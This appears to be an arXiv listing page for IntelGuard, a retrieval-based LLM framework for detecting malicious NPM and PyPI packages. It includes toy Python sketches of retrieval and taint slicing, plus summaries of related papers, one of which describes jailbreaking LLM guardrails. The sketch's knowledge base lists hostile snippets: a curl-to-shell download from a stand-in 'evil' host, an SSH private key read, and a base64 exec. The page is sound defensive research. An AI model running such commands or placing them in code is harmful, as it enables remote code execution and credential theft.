Bridging Expert Reasoning and LLM Detection: A Knowledge-Driven Framework for Malicious Packages
- URL: http://arxiv.org/abs/2601.16458v1
- Date: Fri, 23 Jan 2026 05:31:12 GMT
- Title: Bridging Expert Reasoning and LLM Detection: A Knowledge-Driven Framework for Malicious Packages
- Authors: Wenbo Guo, Shiwen Song, Jiaxun Guo, Zhengzi Xu, Chengwei Liu, Haoran Ou, Mengmeng Ge, Yang Liu
- Abstract summary: Open-source ecosystems such as NPM and PyPI are increasingly targeted by supply chain attacks. We present IntelGuard, a retrieval-augmented generation (RAG) based framework that integrates expert analytical reasoning into automated malicious package detection.
- Score: 10.858565849895314
- License: http://creativecommons.org/licenses/by/4.0/
- Abstract: Open-source ecosystems such as NPM and PyPI are increasingly targeted by supply chain attacks, yet existing detection methods either depend on fragile handcrafted rules or data-driven features that fail to capture evolving attack semantics. We present IntelGuard, a retrieval-augmented generation (RAG) based framework that integrates expert analytical reasoning into automated malicious package detection. IntelGuard constructs a structured knowledge base from over 8,000 threat intelligence reports, linking malicious code snippets with behavioral descriptions and expert reasoning. When analyzing new packages, it retrieves semantically similar malicious examples and applies LLM-guided reasoning to assess whether code behaviors align with intended functionality. Experiments on 4,027 real-world packages show that IntelGuard achieves 99% accuracy and a 0.50% false positive rate, while maintaining 96.5% accuracy on obfuscated code. Deployed on PyPI.org, it discovered 54 previously unreported malicious packages, demonstrating interpretable and robust detection guided by expert knowledge.
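The retrieval step described in the abstract, matching a new package's code against semantically similar malicious examples from a knowledge base, can be illustrated with a toy sketch. Everything below is hypothetical: the snippets, descriptions, and the bag-of-tokens "embedding" are illustrative stand-ins, not IntelGuard's actual knowledge base or code model.

```python
import math
from collections import Counter

# Hypothetical mini knowledge base pairing malicious snippets with
# expert behavioral descriptions (entries are illustrative, not from the paper).
KNOWLEDGE_BASE = [
    ("import os; os.system('curl http://evil/x | sh')",
     "downloads and executes a remote payload at install time"),
    ("open(os.path.expanduser('~/.ssh/id_rsa')).read()",
     "exfiltrates SSH private keys"),
    ("import base64; exec(base64.b64decode(blob))",
     "hides logic behind base64-encoded exec"),
]

def embed(text: str) -> Counter:
    """Toy bag-of-tokens 'embedding'; a real system would use a code model."""
    return Counter(text.replace("(", " ").replace(")", " ").split())

def cosine(a: Counter, b: Counter) -> float:
    dot = sum(a[t] * b[t] for t in a)
    na = math.sqrt(sum(v * v for v in a.values()))
    nb = math.sqrt(sum(v * v for v in b.values()))
    return dot / (na * nb) if na and nb else 0.0

def retrieve(snippet: str, k: int = 1):
    """Return the k most similar (snippet, description) pairs for a query."""
    q = embed(snippet)
    ranked = sorted(KNOWLEDGE_BASE,
                    key=lambda kb: cosine(q, embed(kb[0])), reverse=True)
    return ranked[:k]

# A new package's suspicious line retrieves the closest known behavior.
hits = retrieve("import base64; exec(base64.b64decode(payload))")
print(hits[0][1])  # → hides logic behind base64-encoded exec
```

In the full pipeline the retrieved snippet/description pairs would be placed in the LLM's prompt so it can reason about whether the new code's behavior matches the package's stated functionality; the sketch only covers the retrieval half.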
Related papers
- Mind the Gap: Evaluating LLMs for High-Level Malicious Package Detection vs. Fine-Grained Indicator Identification [1.1103813686369686]
Large Language Models (LLMs) have emerged as promising tools for automated security tasks. This paper presents a systematic evaluation of 13 LLMs for detecting malicious software packages.
arXiv Detail & Related papers (2026-02-18T09:36:46Z)
- Cutting the Gordian Knot: Detecting Malicious PyPI Packages via a Knowledge-Mining Framework [14.0015860172317]
The Python Package Index (PyPI) has become a target for malicious actors. Current detection tools generate false positive rates of 15-30%, incorrectly flagging up to one-third of legitimate packages as malicious. We propose PyGuard, a knowledge-driven framework that converts detection failures into useful behavioral knowledge.
arXiv Detail & Related papers (2026-01-23T05:49:09Z)
- ReasAlign: Reasoning Enhanced Safety Alignment against Prompt Injection Attack [52.17935054046577]
We present ReasAlign, a model-level solution to improve safety alignment against indirect prompt injection attacks. ReasAlign incorporates structured reasoning steps to analyze user queries, detect conflicting instructions, and preserve the continuity of the user's intended tasks.
arXiv Detail & Related papers (2026-01-15T08:23:38Z)
- Unveiling Malicious Logic: Towards a Statement-Level Taxonomy and Dataset for Securing Python Packages [0.19029675742486804]
Existing datasets label packages as malicious or benign at the package level, but do not specify which statements implement malicious behavior. We construct a statement-level dataset of 370 malicious Python packages with 2,962 labeled occurrences of malicious indicators. We derive a fine-grained taxonomy of 47 malicious indicators across 7 types that capture how adversarial behavior is implemented in code.
arXiv Detail & Related papers (2025-12-14T05:28:30Z)
- Taint-Based Code Slicing for LLMs-based Malicious NPM Package Detection [2.398400814870029]
This paper introduces a novel framework that leverages code slicing techniques for LLM-based malicious package detection. We propose a specialized taint-based slicing technique for npm packages, augmented by a backtracking mechanism. An evaluation on a dataset of more than 5,000 malicious and benign npm packages demonstrates that our approach isolates security-relevant code, reducing input volume by over 99%.
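The core idea of taint-based slicing, keeping only statements on a flow from an untrusted source to a dangerous sink so the LLM sees far less code, can be sketched with a minimal line-level propagator. This is a toy illustration only: the source/sink lists are assumptions, the paper's technique works on npm packages with a backtracking mechanism, and a real slicer would operate on an AST rather than substring matches.

```python
import re

# Illustrative taint sources and sinks (assumed for this sketch).
SOURCES = {"input", "os.environ"}
SINKS = {"eval", "exec", "os.system", "requests.post"}

def slice_tainted(lines):
    """Keep only lines on a source-to-sink flow (toy forward propagation)."""
    tainted = set()   # variable names known to carry tainted data
    kept = []
    for line in lines:
        m = re.match(r"\s*(\w+)\s*=\s*(.*)", line)
        rhs = m.group(2) if m else line
        uses_taint = (any(s in rhs for s in SOURCES)
                      or any(v in rhs for v in tainted))
        if m and uses_taint:
            tainted.add(m.group(1))   # assignment propagates taint to LHS
            kept.append(line)
        elif any(s in line for s in SINKS) and uses_taint:
            kept.append(line)          # tainted data reaches a sink
    return kept

prog = [
    "x = 1 + 2",                  # irrelevant, sliced away
    "cmd = os.environ['CMD']",    # tainted source
    "y = x * 3",                  # irrelevant, sliced away
    "os.system(cmd)",             # tainted data reaches a sink
]
print(slice_tainted(prog))
# → ["cmd = os.environ['CMD']", "os.system(cmd)"]
```

Only the two security-relevant lines survive, which is the kind of input-volume reduction the entry reports before handing the slice to an LLM.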
arXiv Detail & Related papers (2025-12-13T12:56:03Z)
- The Trojan Knowledge: Bypassing Commercial LLM Guardrails via Harmless Prompt Weaving and Adaptive Tree Search [58.8834056209347]
Large language models (LLMs) remain vulnerable to jailbreak attacks that bypass safety guardrails to elicit harmful outputs. We introduce the Correlated Knowledge Attack Agent (CKA-Agent), a dynamic framework that reframes jailbreaking as an adaptive, tree-structured exploration of the target model's knowledge base.
arXiv Detail & Related papers (2025-12-01T07:05:23Z)
- VulAgent: Hypothesis-Validation based Multi-Agent Vulnerability Detection [55.957275374847484]
VulAgent is a multi-agent vulnerability detection framework based on hypothesis validation. It implements a semantics-sensitive, multi-view detection pipeline, with each view aligned to a specific analysis perspective. On average, VulAgent improves overall accuracy by 6.6%, increases the correct identification rate of vulnerable-fixed code pairs by up to 450%, and reduces the false positive rate by about 36%.
arXiv Detail & Related papers (2025-09-15T02:25:38Z)
- TraceRAG: A LLM-Based Framework for Explainable Android Malware Detection and Behavior Analysis [8.977634735108895]
We introduce TraceRAG, a retrieval-augmented generation (RAG) framework that delivers explainable malware detection and analysis. First, TraceRAG generates summaries of method-level code snippets, which are indexed in a vector database. At query time, behavior-focused questions retrieve the most semantically relevant snippets for deeper inspection. Finally, based on the multi-turn analysis results, TraceRAG produces human-readable reports that present the identified malicious behaviors and their corresponding code implementations.
arXiv Detail & Related papers (2025-09-10T06:07:12Z)
- BlindGuard: Safeguarding LLM-based Multi-Agent Systems under Unknown Attacks [58.959622170433725]
BlindGuard is an unsupervised defense method that learns without requiring any attack-specific labels or prior knowledge of malicious behaviors. We show that BlindGuard effectively detects diverse attack types (i.e., prompt injection, memory poisoning, and tool attacks) across multi-agent systems.
arXiv Detail & Related papers (2025-08-11T16:04:47Z)
- Defending against Indirect Prompt Injection by Instruction Detection [109.30156975159561]
InstructDetector is a novel detection-based approach that leverages the behavioral states of LLMs to identify potential IPI attacks. InstructDetector achieves a detection accuracy of 99.60% in the in-domain setting and 96.90% in the out-of-domain setting, and reduces the attack success rate to just 0.03% on the BIPIA benchmark.
arXiv Detail & Related papers (2025-05-08T13:04:45Z)
- Detecting Malicious Source Code in PyPI Packages with LLMs: Does RAG Come in Handy? [6.7341750484636975]
Malicious software packages in open-source ecosystems, such as PyPI, pose growing security risks. In this work, we empirically evaluate the effectiveness of Large Language Models (LLMs), Retrieval-Augmented Generation (RAG), and few-shot learning for detecting malicious source code.
arXiv Detail & Related papers (2025-04-18T16:11:59Z)
- Towards Copyright Protection for Knowledge Bases of Retrieval-augmented Language Models via Reasoning [58.57194301645823]
Large language models (LLMs) are increasingly integrated into real-world personalized applications. The valuable and often proprietary nature of the knowledge bases used in RAG introduces the risk of unauthorized usage by adversaries. Existing methods, which can be generalized as watermarking techniques to protect these knowledge bases, typically involve poisoning or backdoor attacks. We propose an approach for harmless copyright protection of knowledge bases.
arXiv Detail & Related papers (2025-02-10T09:15:56Z)
This list is automatically generated from the titles and abstracts of the papers on this site. This site does not guarantee the quality of the listed information and is not responsible for any consequences of its use.